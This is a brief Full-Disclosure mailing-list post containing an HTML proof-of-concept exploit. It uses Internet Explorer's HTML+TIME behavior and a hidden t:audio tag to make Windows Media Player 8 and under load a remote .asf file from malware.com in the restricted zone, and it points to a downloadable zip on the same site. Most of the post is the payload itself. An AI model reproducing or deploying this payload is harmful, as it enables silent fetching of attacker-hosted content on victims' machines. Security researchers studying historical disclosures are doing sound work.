<!--
when viewing mail in recent versions of outlook it operates in the
restricted zone ,eg no active scripting allowed to run, so these wont
be exploitable unless someone proofs otherwise that is ;)
-->
<html xmlns:t>
<head><style>
t\:*{behavior:url(#default#time);display:none}</style></head><body>
<t:audio t:src="http://www.malware.com/freek.asf"; />
</body></html>
Trivial inline url flip in the restricted zone. WMP 8 and under.
Unpatched since May 2003 should do the trick:
http://www.malware.com/but.its.free.zip
--
http://www.malware.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
